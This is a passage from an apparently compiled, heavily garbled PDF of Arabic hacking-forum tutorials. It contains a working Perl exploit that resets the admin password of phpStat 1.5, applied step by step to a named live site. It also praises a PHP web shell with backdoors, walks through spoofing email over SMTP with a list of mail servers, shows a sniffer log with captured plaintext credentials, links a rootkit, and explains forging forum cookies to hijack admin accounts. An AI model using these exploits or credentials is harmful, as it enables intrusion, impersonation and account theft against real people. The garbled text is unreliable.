repeats commands ....... ! More commands with a better description (Not all commands are .(listed cat: ­b, ­­number­nonblank .Number all nonblank output lines, starting with 1 485 e­ .Equivalent to ­vE n, ­­number­ .Number all output lines, starting with 1 s, ­­squeeze­blank­ .Replace multiple adjacent blank lines with a single blank line t­ .Equivalent to ­vT u­ .d; for Unix compatibility‫التجاھل‬ v, ­­show­nonprinting­ Display control characters except for LFD and TAB using `^' notation and precede .'­characters that have the high bit set with `M A, ­­show­all­ .Equivalent to ­vET E, ­­show­ends­ .Display a `$' after the end of each line T, ­­show­tabs­ .'Display TAB characters as `^I help­­ .Print a usage message and exit with a status code indicating success version­­ .Print version information on standard output then exit ‫أنصحكم بانكم تشوفو الومر بانكم تختارو من الیسار للیمین بیكون أحسن‬ 486 ‫و ھنا أضع آخر نقطة‬ ‫بعض المواقع المھمة‬ ‫موقع دراكول العربي و اللي ھوة لیة و للفتاك‬ /http://www.ardra.tk ‫ مكتبـة و ل أروع شـاملة و كاملـة‬b­hunter ‫للخ‬ /http://www.hack4arab.org ‫ما شاء االله‬ ‫ أكاديمیة بحر العیوني المنیة للخ العزيز بحر العیون‬ /http://www.bahory.com ‫كمان مكتبة ما ممكن تمل‬ 784 ‫ھل تريد شلااا حقیقیا‬ 0891Worse :‫للكاتب‬ ‫انا مـلحظ ان اغلى الدوات على قلوب ربعنا الھاكرز ھي الشلز‬ ‫وماالومھم واالله يلوم اللي يلومھم‬ ‫الموضوع عبـاره عن افضل بي اتش بي شل موجود بالساحه من وجھة نظري‬ 75r ‫من البي اتش بي شل المعروف‬1.1 ‫وھو االصدار‬ !!!‫ھذا الشل مجنوون بمعنى الكلمه‬ ‫ساقوم بشرح السكربت بسم االله نبداا‬ ‫مكان وضع اوامر يونكس وتنفیذھا‬ ‫استخراج اھم الملفات على السیرفر بما فیھا ملفات الباسووردات‬


‫امر ابلود ولشــــك انه من اھم الوامر‪ ‬‬ ‫المر المعرووف ‪ wget‬المحبب لدى الكثیرين‪ ‬‬ ‫‪ 884‬‬ ‫عمل بايند شل او كمى يسمى فتح بورت او تشغیل باك دورسم اللي يحللك‬ ‫فتح باك دور باتصال عكسي ‪ :: back­connect ::‬لتخطي مشاكل الفايروول‪ ‬‬ ‫ملحظه ‪:1‬الباكدورز ممكن تشغلھم بسي وال ببیرل‪ ‬‬ ‫ملحظه ‪:2‬انا مااثق بالفريق لني مااعرفھم ويمكن يكون فیه سكربتات خبیثه‪ ‬‬ ‫بالكود اذا حد عنده خبره ليبخل بالفحص!!‪ ‬‬ ‫‪ 984‬‬ ‫تعلم كیفیة ترجمة الثغرات بلغة البیرل مع تطبیق عملي‪ ‬‬ ‫للكاتب‪:‬الھاكر الصغیر‪ ‬‬ ‫اول شيء الموضوع لم اقم بكتبتة في اي منتدي غیر منتدانا الكريم‪ ‬‬ ‫موضعنا الیوم مھم جدا جدا جدا وھ و كیفیة استثنار الثغرات وترجمتھا من لغة‪ ‬‬ ‫البیرل وتطبیقھا علي الموقع ومن ثم‪ ‬‬ ‫اختراقة‪ ‬‬ ‫الحین نبدأ !! اول شيء الداوات المستخدمة لترجمة ثغرات البیرل وھي برنامج‬ ‫اكتف بیرل‪ ‬‬ ‫برنامج ‪ activeperl‬وصلة تحمیلة‪ ‬‬ ‫‪ ­http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl‬‬ ‫‪ 5.8.2.808­MSWin32­x86.msi‬‬ ‫الحین بعد تنصیبة علي الجھاز نبدأ بتطبیق درسنا‪ ‬‬ ‫الحین نشوف مثال لحد ثغرات مواقع السیكیورتي الحديثة وھي ثغرة في‪ ‬‬ ‫مواقع ‪ PHPStat Setup‬‬ ‫الحین ركزوا معايا في الدرس وكیفیة ترجمة الثغرة وفھمھا وانا جايب ثغرة‪ ‬‬ ‫سھلة مشان ما تتعقدو‪ ‬‬ ‫الحین كیف نعرف انھا بلغة البیرل من التاالي ‪ /usr/bin/perl‬ده بیكون في اول‪ ‬‬ ‫الثغرة معاناھا انھا بلغة البیرل‪ ‬‬ ‫مشان المبتدئین يعرفوا احنا شغالیین كیف‪ ‬‬ ‫الحین نبدأ نذكر اھم السس لترجمة اي ثغرة‪ ‬‬ ‫اول شيء النظر للغة الثغرة ازا كانت بلغة السي او بلبیرل او البايثون او غیرة‪ ‬‬ ‫‪ 094‬‬ ‫ثانیا النظر للمتغیرات او‪ usage ‬مع التركیز فیھا وتطبیقھا بدقة‪ ‬‬ ‫يلنبدأ كود الثغرة‪ ‬‬ ‫‪ #!/usr/bin/perl‬‬ ‫‪###########################################‬‬ ‫‪ ####### ###################‬‬ ‫‪ #T r a p ­ S e t U n d e r g r o u n d H a c k i n g T e a m‬‬ ‫‪###########################################‬‬ ‫‪ ####### ###################‬‬ ‫‪ # EXPLOIT FOR ­ PHPStat Setup.PHP Authentication Bypass‬‬ ‫‪ Vulnerability‬‬ ‫‪ #‬‬ ‫)‪ #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus­v ‬‬ ‫‪ Alpha_Programmer@Yahoo.com#E­Mail :‬‬ ‫‪ #‬‬ ‫!!‪ #This Xpl Change Admin's Pass in This Portal ‬‬ ‫‪ #Discovered by: SoulBlack‬‬ ‫‪ #‬‬ ‫‪ #Vulnerable Version : phpStat 1.5‬‬ ‫‪ #‬‬


########################################### ####### ################### # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # # So Iranian Hacking & Security Teams : # # Crouz , Shabgard , Simorgh­ev ,IHS , Emperor & GrayHatz.NeT ########################################### ####### ################### 491 use IO::Socket; if (@ARGV < 3) { print "\n========================================= =\n"; print " \n ­­ Exploit By Alpha Programmer ­­\n\n"; print " Trap­Set UnderGrounD Hacking Team \n\n"; print " Usage: <T4rg3t> <DIR> <Password>\n\n"; print "=========================== ===============\ n\n"; print "Examples:\n\n"; /phpstat/ 12345\n";http://www.site.com/print " phpStat.pl exit(); } my $host = $ARGV[0]; my $remote = IO::Socket::INET­>new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "C4nn0t C0nn3ct to $host" } print "C0nn3cted\n"; $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[ 2] HTTP/1.0\n"; $http .= "User­Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; $http .= "Host: $host\n\n\n\n"; 492 print "[+]Sending H3ll Packet ...\n"; print $remote $http; sleep(1); print "[+]Wait For Authentication Bypass ...\n"; sleep(100); while (<$remote>) { } print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; print "[+]User: admin\n";


‫;"]‪ print "[+]Pass: $ARGV[2‬‬ ‫‪ #‬‬ ‫الحین ترجمتھا بلتكون كالتالي‪ ‬‬ ‫انسخ الكود وضعة في مفكرة مع تغیر ال‪usage ‬او المتغیرات وھي في ھذا‪ ‬‬ ‫الجزء من الكود‪ ‬‬ ‫;"‪ Usage: <T4rg3t> <DIR> <Password>\n\n‬‬ ‫‪ print‬‬ ‫\‪"========================================== ‬‬ ‫;"‪ n\n‬‬ ‫;"‪ print "Examples:\n\n‬‬ ‫‪ /phpstat/ 12345\n";http://www.site.com/print " phpStat.pl‬‬ ‫;)(‪ exit‬‬ ‫}‪ ‬‬ ‫الحین غیر اسم الموقع باسم الموقع المصاب وضعو داخل المفكرة‪ ‬‬ ‫وبیكون التغیرات كاتالي‪ ‬‬ ‫‪ 493‬‬ ‫‪/phpstat/ 12345\n"; http://www.breatheoneslast.com/phpStat.pl‬‬ ‫وھ ذا الموقع اللي بنطبق علیة ‪ www.breatheoneslast.com/phpstat /‬‬ ‫ولحظ اللتزام لمسافات داخل الكود والتعامل بحرص‪ ‬‬ ‫واحفظة بامتداد ‪ pl‬وسمیة اي اسم مثل ‪ sherba‬وضعة داخل مجلد‪ ‬‬ ‫‪ C:\Perl\bin‬‬ ‫الحین روح للدوس واكتب التالي‪ ‬‬ ‫الحین انت داخل مجلد البیرل اكتب التالي في الدوس‪ ‬‬ ‫‪ 494‬‬ ‫الحین ظھرللك الباس والیوز للموقع بدون تشفیر لووووووووووووووووووول‪ ‬‬ ‫الحین ھ ذا مجرد مثال بسیط لثغرة بسیطة وطبعا كل ثغرة ولھا عیبوبھا‪ ‬‬ ‫وممیزاتھا‪ ‬‬ ‫الحین ابي اشوف الثغرات الحديثة اللي بلغة البیرل مترجمة معانا في المتتدي‬ ‫انشاء االله‪ ‬‬ ‫وانتظروا بقیة دروسي لتعلیم فنون الھكر‪ ‬‬ ‫ملحوظة ھ امة جدا اايبي ينقل الموضوع يكتب التالي‪ ‬‬ ‫\\جمیع الحقوق محفوظة للھاكر الصغیر‪ //‬‬ ‫\\منتدي مافیا و & و منتدي عالم القراصنة‪ //‬‬ ‫‪ 594‬‬ ‫ارسال رسالة مزيفة بالتلنت‪ ‬‬ ‫‪ -1‬نتعرف على التعامل مع التلنت‪ ‬‬ ‫‪ -2‬نرسل رساله مزيفه يعني نخدع الشخص اللي نبي نرسل له الرساله‪ ‬‬ ‫فیظن الرساله فعل من الجھة المرسله‪ ‬‬ ‫قبل البدء سأعطیك المعلومات ھذي او اذكرك فیھم ؟؟؟‪ ‬‬ ‫خدمة نقل الملفات لي شركه (العالمیه مثل ) السیرفر او الھوست ھو‪ ‬‬ ‫‪ 12:ftp.anet.net.sa‬‬ ‫خدمة البريد (وغالبا) تبدأ ‪ mail‬ال اذا كانت الشركة لھا اكثر من خادم‪ ‬‬ ‫‪ 52:mail.anet.net.sa‬‬ ‫( بورت البريد الصادر ‪ 52‬والبريد الوارد ‪ )011‬اللي يھمنا الحین الصادر‪ ‬‬ ‫ھناك خدمات مثل الخبار والقوائم البريديه مالنا شغل بھا‪ ‬‬ ‫صراحه كنت ناوي اطرح الموضوع على جزؤين (مدري وشلون الھمزه تكتب‪ ‬‬ ‫على واو او نبره)‪ ‬‬ ‫نسیتھ ا لني مواصل حین كتابة الموضوع‪ ‬‬ ‫المھ م اكثر الناس يقول انا بخترق السیرفر عن طريق التلنت ‪ ....‬صحیح ھذا‬ ‫الكلم اول؟؟؟‪ ‬‬


‫‪ 694‬‬ ‫انا اوقف عند ھذه النقطة لعتبارات منھا ما ادري وش رد فعل المشرف على‪ ‬‬ ‫الكلم‪ ‬‬ ‫ھذا واحد الشي الثاني ماودي اجازف في كثیر من المغالطات مثل اللي حصل‬ ‫بموضوع بالھوتمیل‪ ‬‬ ‫نرجع لموضوع الرساله المزيفه احسن ‪...‬؟؟؟‪ ‬‬ ‫اذھب الى ابدأ === تشغیل ====اكتب فقط ‪== telnet‬طبعا في طريقه ‪ 2‬‬ ‫بس‪ ‬‬ ‫( السحه ھي التمره) مثل نجدي المھ م رايح تطلع لك نافذه اختر من قائمة‪ ‬‬ ‫تیرمنل === برافنسس (تفضیلت ) ضع علمة صح عند كل الخیارات اللي‪ ‬‬ ‫ماعندھا صح‪ ‬‬ ‫واترك الباقي مثل ماھو علیه السبب في ذلك على شان تشوف اللي تكتبه‪ ‬‬ ‫لنك لو تكرتھا وكتبت شي مارايح يظھر معك بعدھا اضغط على اوكي‪ ‬‬ ‫الن من قائمة (‪ (connect‬اختر (‪ (remot systim‬تطلع لك نافذه فیھا ‪ 3‬خیارت‪ ‬‬ ‫‪ 1­ host name‬‬ ‫‪ 2­ port‬‬ ‫‪ 3­ term type‬‬ ‫اكتب فیھ ا على الترتیب (انت رايح تستنتج السبب )‪ ‬‬ ‫‪ mail.anet.net.sa-1‬او الشركه اللي انت مشترك فیھا‪ ‬‬ ‫‪ 52 - 2‬على شان صادر البريد‪ ‬‬ ‫‪ 794‬‬ ‫‪ -3‬خلھا زي ماھي علیه لتغیرھا‪ ‬‬ ‫اضغط على كونكت رايح يتصل بسیرفر العالمیه او الشركه اللي مشترك فیھا‪ ‬‬ ‫وتلحظ بشريط العنوان حق نافذة البرنامج اسم الشركة دلیل على اتصاله بھا‬ ‫بعد ذلك تظھ ر على الشاشه ارقام وخرابیط دلله انك متصل والمؤشر يغامز‪ ‬‬ ‫ينتظر‪ ‬‬ ‫منك تكتب فیه ( بما اني مشترك عن طريق العالمیه ) وانت من شركه اخرى‬ ‫ممكن يطلب اسم مستخدم وكلمة مرور اكتب فیه على التوالي‪ ‬‬ ‫‪ anonymous‬‬ ‫‪ billgates@arabtimes.com‬‬ ‫او اي كلمة تختارھ ا عموما انا رايح احط لك سیرفرات (خوادم) للبريد عن طريق‬ ‫التلنت‪ ‬‬ ‫في النھاية‪ ‬‬ ‫نرجع للموضوع لتواخذوني على السھاب متعودين على الشرح‪ ‬‬ ‫بعد الخرابیط اكتب مايلي ( عنوان الشخص اللي يعتبر مرسل الرساله)‪ ‬‬ ‫‪ mail from:webmaster@hotmail.com‬‬ ‫لحظ المسافه اللي بین المیل وفروم البريد اي واحد تختاره مو شرط اللي انا‪ ‬‬ ‫كاتبه‪ ‬‬ ‫انشاء االله تحطه بريد كوفي انان انا مالي شغل‪ ‬‬ ‫‪ 894‬‬ ‫بعدھا تطلع لك رسالة زي ذي‪ ‬‬ ‫‪ >webmaster@hotmail.com> ... Sender Okay‬‬ ‫او قريب من الرقم ‪ ...‬معناته انك ماشي صح وال ارجع اكتب السطر من جديد‬ ‫بعدھا اكتب الشخص المستلم الرسالة واكتب ‪ :‬‬ ‫‪ rcpt to:any_wa7eed@yahoo.com‬‬ ‫طبعا اي شركه واذا كانت خطواتك صح رايح يطلع لك زي السطر التالي‪ ‬‬ ‫‪ >any_wa7eed@yahoo.com> ... Recipiant Okay‬‬ ‫بعد ذلك اكتب‪ ‬‬ ‫‪ data‬‬ ‫رايح يطلع لك السطر التالي‪ ‬‬


‫‪ 453 Enter mail, end with "." on a line by itself‬‬ ‫اكتب ھنا الرساله التالیه او اي رساله تبیھا‪ ‬‬ ‫من بیل قیتس‪ ‬‬ ‫الى فلن بن علن‪ ‬‬ ‫نظرا لجھ ودك المتمیزه فقد قررت ان ازوجك ابنتي على شرط‪ ‬‬ ‫‪ -1‬ان تمتنع عن التدخین‪ ‬‬ ‫‪ 994‬‬ ‫‪ -2‬عدم الوقوف عند باب منزلكم لمعاكسة بنات الثانوي لن ھذا عیب‪ ‬‬ ‫‪ -3‬تزور اصدقاءك اللي مازرتھم من فتره وتصل ارحامك اللي النت مشغلتك‪ ‬‬ ‫عنھم‪ ‬‬ ‫اما عن المؤخر فھو‪ ‬‬ ‫سیرفر منزل علیه يونكس الصدار ‪ 005‬وحطبه‪ ‬‬ ‫=====================================‪ ‬‬ ‫وبعد ماتنتھ ي اكتب "‪ " .‬النقطة بدون علمتي تنصیص "" ثم انتر‪ ‬‬ ‫اكتب بعدھا‪ ‬‬ ‫‪ quit‬‬ ‫طبعا خويك بعد ماتصله الرساله رايح يطیر من الفرحه ويروح لبوه ويلبس البشت‬ ‫وللمطار اقرب رحله لمريكا رايحین يخطبون بنت بل قیتس ويزفھا بداتسون‪ ‬‬ ‫(ددسن )‪ ‬‬ ‫غمارتین بدون ھنقلین‪ ‬‬ ‫اما بالنسبه لخوادم البريد التي يمكن اسنخدامھا فھي‪ ‬‬ ‫‪ 52:mail.airmail.net‬‬ ‫‪ 52:mail.geocities.com‬‬ ‫‪ 52:mnsi.net‬‬ ‫‪ 52:hacker.com‬‬ ‫‪ 52:mail.iaw.on.ca‬‬ ‫‪ 52:pdx.sisna.com‬‬ ‫‪ 52:jaring.my‬‬ ‫‪ 52:chollian.dacom.co.kr‬‬ ‫‪ 005‬‬ ‫‪ all­yours.net:25‬‬ ‫‪ plix.com:25‬‬ ‫‪ ids.net:25‬‬ ‫‪ student.uq.edu.au:25‬‬ ‫‪ istar.ca:25‬‬ ‫‪ total.net:25‬‬ ‫‪ mail.tfs.net:25‬‬ ‫‪ ecis.com:25‬‬ ‫‪ mindspring.com:25‬‬ ‫‪ popmail.uc.edu:25‬‬ ‫‪ mail.atcon.com:25‬‬ ‫‪ future.net:25‬‬ ‫‪ aloha.net:25‬‬ ‫‪ ovnet.com:25‬‬ ‫‪ connect.reach.net:25‬‬ ‫‪ valley­internet.net:25‬‬ ‫‪ valleynet.com:25‬‬ ‫‪ milo.cfw.com:25‬‬ ‫‪ scs.august.com:25‬‬ ‫‪ hiwaay.net:25‬‬


‫‪ clandjop.com:25‬‬ ‫‪ unix.diisd.k12.mi.us:25‬‬ ‫‪ erie.net:25‬‬ ‫‪ voyager.net:25‬‬ ‫‪ awod.com:25‬‬ ‫‪ netforward.com:25‬‬ ‫‪ netcreations.com:25‬‬ ‫‪ mail.wantree.com.au:25‬‬ ‫‪ ns.net:25‬‬ ‫‪ microserve.net:25‬‬ ‫‪ wbs.net:25‬‬ ‫‪ hwg.org:25‬‬ ‫‪ eff.org:25‬‬ ‫‪ europe.std.com:25‬‬ ‫‪501‬‬ ‫‪ 52:misty.com‬‬ ‫‪ 52:succeed.net‬‬ ‫‪ 52:mail.discovery.com‬‬ ‫‪ 52:cnet.com‬‬ ‫‪ 52:nytimes.com‬‬ ‫‪ 52:w3.org‬‬ ‫‪ 52:mail.audionet.com‬‬ ‫‪ 52:mit.edu‬‬ ‫طبعا مھام التل نت ما تنحصر على ھذول الشیاء بس‪ ‬‬ ‫التل نت ھو عباره عن ‪ clint‬ممكن يشبك على اي شيء‪ ....‬اي سیرفر‪ ...‬يعني‬ ‫ممكن تستخدمه كـ‪ FTP‬لو عرفت الوامر و و و و و و‪ ‬‬ ‫حتى متصفح‪ ...‬او تستبدله بدل الكلينت للسب سفن‪..‬لوووو عرفت الوامر‪ ‬‬ ‫‪ 205‬‬ ‫‪ Network Sniffing‬‬ ‫للكاتب‪ Fighter:‬‬ ‫إنشاء االله سنتناول موضوع ‪ Network Sniffing‬‬ ‫انا اعتقد ان ‪ Network Sniffing‬من اھم الشیاء اللتي ينبغي لي مھاجم او‪ ‬‬ ‫لي مسؤول في اي نظام ان يتقنھا‪ ‬‬ ‫طیب ‪ ،‬يعني ايه ‪ Network Sniffing‬أساسا?‪ ‬‬ ‫الترجمة الحرفیة لكلمة ‪ sniff‬معناھا "يشم" لكني سأسمیھا "يتصنت" بالتالي‬ ‫‪Network Sniffing‬معناھا" التصنت على الشبكة "‪ ‬‬ ‫ال ‪ Network Sniffers‬ما ھ ي ال ادوات يتم تركیبھا على النظام (سواء تم‪ ‬‬ ‫تركیبھا من قبل المھ اجم ‪ ،‬او من قبل مسئول النظام ) تتیح بتركیبھا إمكانیة‪ ‬‬ ‫التصنت أو الطلع على كل التصالت اللتي تتم من وإلى النظام‪ ..‬‬ ‫الخطورة في ال ‪ Network Sniffers‬تكمن في انھا تستطیع الكشف عن ال‪ ‬‬ ‫" ‪ passwords‬كلمات المرور" لي مستخدم يستخدم خدمات كال‪ ‬‬ ‫‪telnet/ftp/rlogin/IMAP/Pop .. etc‬على النظام المركب علیه تلك‪ ‬‬ ‫"المتصنتات‪ "..‬‬ ‫يعني مثل‪ ..‬‬ ‫بافتراض ان مھ اجم ما نجح في اختراق سرفر (خادم او ھوست) ولیكن عنوان‪ ‬‬ ‫النظام المخترق ‪ server­1.hacked.net‬‬ ‫ونجح ذلك المھاجم بتركیب "متصنت" على ‪ server­1.hacked.net‬‬ ‫بذلك سیستطیع المھاجم الطلع على ما يقوم المسؤول عن‪ server-‬‬ ‫‪ 1.hacked.net‬من انشطة ‪ ،‬فبالتالي لو قام ذلك المسئول بالتصال بسرفر آخر‬ ‫‪server­2.hacked.net‬عن طريق التلنت مثل ‪ ،‬ستقوم "المتصنتات" بتسجیل‪ ‬‬


، user name ‫طبعا ھذه النشطة ستحتوي على‬، ‫كافة انشطة ذلك المسؤول‬ server-‫واللتي سیستخدمھا المھاجم لحقا للدخول على‬ password ... ‫وال‬ ...‫وھكذا‬ server-2 ‫ومن ثم سیركب "متصنت "آخر جديد على‬ ،2.hacked.net ‫يعني خلل فترة قصیرة قد ينجح المھاجم في السیطرة على عشرات (واحیانا‬ 305 !! ‫مئات ) من النظمة الخرى انطلقا من نظام واحد مخترق‬ ‫ تقرير المتصنتات" و ھو كنت قد‬sniffers log "‫لبعض التوضیح ساضع جزء من‬ ‫ لحظ ايه المكتوب‬... ‫ركبته على نظام مخترق‬ ­­­­­­­­­­­­­­­­­­­­­­­­> HTTP/1.1 200 OK Date: Wed, 14 May 2003 21:15:11 GMT Server: Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.4 mod_auth_pam_external/0.1 mod_perl/1.25 Content­Location: index.html Vary: negotiate TCN: choice Last­Modified: Wed, 23 Jan 2002 09:56:37 GMT ETag: "398bf­39­3c4e88d5;3d406487" Accept­Ranges: bytes Content­Length: 57 Connection: close Content­Type: text/html :http://www.carebridge.org/ftp http://www.carebridge.org./Connected to ] http://www.carebridge.org/220 ProFTPD 1.2.2rc1 Server (ProFTPD) [ ready. ): 331 User denni okay, need http://www.carebridge.org:tim/Name ( password. Password:andreana033 telnet localhost 23 : Trying 127.0.0.1... Escape character is '^]'. Red Hat Linux release 6.1 (Cartman) Kernel 2.2.12­20 on an i686login:mnadag Password:cjc997 504 : 18.92.83.802 telnet ...18.92.83.802 Trying .18.92.83.802 Connected to .']^' Escape character is 3002 16:18:3217 May Enter your user id: manager user password:netprowler : 52 telnet localhost ...1.0.0.721 Trying .Connected to localhost .']^' Escape character is ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­< ..‫لحظ انه تم القیام بعدة عملیات اتصال من وإلى النظام‬


‫في عملیتین منھم منھم استعطت الحصول على ‪ passwords‬لنظامین جديدين‬ ‫ومن ثم ساحاول ان اخذ صفة ‪ local root‬على القل واحد من النظمة‪ ‬‬ ‫الجديدة‪..‬لیكون بامكاني تركیب ‪ sniffer‬جديد ‪ ...‬وھكذا‪ ‬‬ ‫‪sniffers‬للیونكس‪ ‬‬ ‫الواقع ‪ ...‬يوجد الكثیر من ال ‪sniffers‬لنظام الیونكس ‪ ،‬لعل اكثرھم شھرة بین‪ ‬‬ ‫مسؤولي انظمة الیونكس ھو ‪ snort ..‬‬ ‫لكن بالنسبة لمھاجمین النظام ‪ ،‬والذين ھم بحاجة الى ‪ sniffer‬صغیر وفعال‪ ‬‬ ‫فاعتقد ان متلصص ك ‪ SuckIT‬جید ‪ ،‬وخاصة انة ‪ root kit‬متعدد الستخدامات‪ ‬‬ ‫‪ ...‬يمكن الحصول علیه من ‪ http://hysteria.sk/sd/sk‬‬ ‫وايضا ‪ snifit‬من‪ ‬‬ ‫‪ http://reptile.rug.ac.be/~coder/sniffit/sniffit.html‬‬ ‫وھ ي تعمل على انظمة مختلفة‪ linux/bsd/solaris‬‬ ‫‪sniffers‬للويندوز‪ ‬‬ ‫‪ NetworkActivSniffer‬‬ ‫‪ http://www.zone­h.org/files/52/NetworkActivSnifferV1.4.exe‬‬ ‫وھي اداه صغیرة‪ ،‬ومجانیة‪ ‬‬ ‫‪ 505‬‬ ‫شرح تفصیلى للكوكى اديتور‪ ‬‬ ‫مش لقى موضوع اشرحه قولت لما اجیب حاجه شبه قديمه واشرحھا تفصیلیا‬ ‫اسم البرنامج ‪ :cookie editor‬‬ ‫وظیفه البرنامج‪:‬تغییر الكوكیز (‪ (ID,PASS‬‬ ‫‪--------------‬تمھ ید ‪ ---------------‬‬‫يقوم برنامج الكوكى اديتور بتغییر الباسورد بتاع الكوكیز بدون الحاجه الى فكه‪ ‬‬ ‫يعنى مشفر الى مشفرالصراحه برنامج حلو‪ ‬‬ ‫‪--------------‬الشرح ‪ ---------------‬‬‫‪1‬حمل البرنامج من الوصله التالیه‪ ‬‬‫‪ http://www.kw20.com/file/Cookie Editor.zip‬‬ ‫‪2‬سطب البرنامج وبعد التسطیب قم بفتحه فسوف يظھر لك صورته كالتالى‪ ‬‬‫اوكى ھا الحین بتظھ ر المواقع المفتوحه واللى بتنزل فى جھازك كوكیز‪ ‬‬ ‫(ذا قفلت الموقع حیتشال من القائمه اللى فى البرنامج)‪ ‬‬ ‫‪ 605‬‬ ‫‪3‬نفتح المنتدى اللى بنريد تغییر الكوكیز بتاعه ونسجل دخول‪ ‬‬‫‪4‬نقوم بعمل ريفريش للبرنامج حنلقى كما بالصوره التالیه الموقع قد ظھر‪ ‬‬‫الكوكیز بتاع عضويتك كما بالصوره‪ ‬‬ ‫فى الخانه ‪ 13‬و ‪(( 23‬بین توقیعى ع الصوره)) والخاصه بالكوكیز بتاعك انتا لن‬ ‫حتلقى واحده منھا مكتوب جنبھا ‪ bblastvisit‬‬ ‫ده مالناش دعوه بیھا‪.‬اھم حاجه لینا ھوا (‪ (bbuserid,bbuserpass‬‬ ‫اوكى‪ ‬‬ ‫‪5‬نختار اول واحده(‪(bbuserid‬رقم ‪23‬كلیك يمین بالماوس ونضغط على اديت‪ ‬‬‫زى ما موجود فى الصوره‪ ‬‬ ‫‪ 705‬‬ ‫حیظھر لنا المربع التالى‪ ‬‬ ‫الخانه الولى سیبھا زى ماھیا اما التانیه فده بقى اللى عايزه تتعدل‬ ‫‪ 805‬‬ ‫وھ ى الى دى وحسب بقى كوكیز الدمن لو كان رقم ‪ 1‬اكتب ‪ 1‬ولو كان كوكیز‬ ‫الدمن ‪ 2‬اكتب ‪ 2‬وھكذا بقى‪ ‬‬ ‫ثم اضغط سیی ییییییییییییییییییییییییییف‪ ‬‬ ‫‪6‬نختار ثانى واحده(‪(bbpassword‬رقم ‪33‬كلیك يمین بالماوس ونضغط على‪ ‬‬‫اديت‪ ‬‬ ‫حیظھر التالى‪ ‬‬


‫الخانه الول سیبھا زى ماھیا اما التانیه فتكتب بیھا باسورد الدمن المشفر ثم‬ ‫اضغط ع سییییییییییییییییییییف‪ ‬‬ ‫‪7‬تاكد من التالى‪ ‬‬‫اوعى تضغط على ريفريش فى البرنامج بل تسیب كل حاجه زى ماھیا‪ ‬‬ ‫‪8‬ودلوقتى تعمل ريفريش للمنتدى فاذا ظھر كوكیز الدمن خیر وبركه وده‪ ‬‬‫بیحصل فى منتديات ‪xmb‬غالبا‪ ‬‬ ‫ولو مانفع اقفل صفحه المنتدى بدون تسجیل خروج ثم اعد دخول المنتدى وان‬ ‫شاء االله يتغیر الكوكیز وتبقى الدمن‪ ‬‬ ‫كل الخطوات السابقه لزم تتم وانتا سايب الكوكى اديتور زى ماھوا من غیر‪ ‬‬ ‫‪ 905‬‬ ‫ريفريش‪ ‬‬ ‫‪9‬ادخل فى لوحه تحكم المدير بالمنتدى نفسه‪ ‬‬‫ثم اكتب اسم ايمیلك واضغط على سیییییییییف‪ ‬‬ ‫‪01‬اعمل ‪ forget my password‬حتى تستعید باسوردك المفقود‪ ‬‬‫‪11‬بعد ما تتبعت الرساله ع اليمیل خد الباس وخش على لوحه تحكم الدمن‬‫ومبررررررررررررررررررروك علیك يامان‪ ‬‬ ‫)))ملحوظه اخیره (((‪ ‬‬ ‫فى الخطوه ‪ 5‬و ‪6‬مش شرط تكون الرقام بتاعت الموقع اللى حتخترقه كذا بل‬ ‫ده حسب الترتیب عندى وبتختلف عند كل واحد حسب المواقع اللى‪ ‬‬ ‫شغاااااااااال علیھا‪ ‬‬ ‫ولو عايز تتاكد من السم حتلقى فى السطر بتاع‪(bbuser‬و(‪bbpass‬اسم‪ ‬‬ ‫الموقع اللى عايز تخش علیه‪ ‬‬ ‫‪ 015‬‬ ‫شرح برنامج ‪ nmap‬‬ ‫للكاتب‪ B­Hunter:‬‬ ‫بسم االله الرحمن الرحیم‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫شرح برنامج‪ Network mapper ­ Nmap‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫قام بكتابة الشرح‪ : B­Hunter‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫شكر خاص لـ ‪ SaD jAckAl‬لستخدامنا ال ‪ IP‬الخاص به لعمل التجارب‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫مراجع افادتني في كتابة الموضوع‪ :‬‬ ‫‪ /http://www.google.com‬‬ ‫‪ http://www.insecure.org/nmap‬‬ ‫‪ http://www.iana.org/assignments/port­numbers‬‬ ‫‪ nmap ­h‬‬ ‫‪ HACK NOTES : Linux & Unix Security Portable Reference‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪--‬البدايه‪ ---‬‬‫في البدايه نريد ان نقول‪ ‬‬ ‫ما ھو برنامج ‪ Network mapper‬؟‪ ‬‬ ‫الجواب ‪ :‬ھو برنامج ‪ Port Scanner‬لبروتوكول ‪ TCP‬و ‪ UDP‬وامور اخرى مفیده‪ ‬‬ ‫جدا وسنذكرھا جمیعھا في ھذا الموضوع‪ .‬‬ ‫من ھو كاتب ھذا البرنامج ؟‪ ‬‬ ‫الجواب ‪ :‬المبرمج ھو ‪ Fyodor‬واعتقد بانه روسي مع انه يقول بأنه لیس روسیا‬ ‫(( ولكن شخصیا اظن انه روسي بعد ما شفته في‪ ‬‬ ‫الـ ‪ Defcon‬مع الـ‪ w00w00 Team :-‬‬ ‫ما ھي النظم التي يعمل علیھا ھذا البرنامج ؟‪ ‬‬


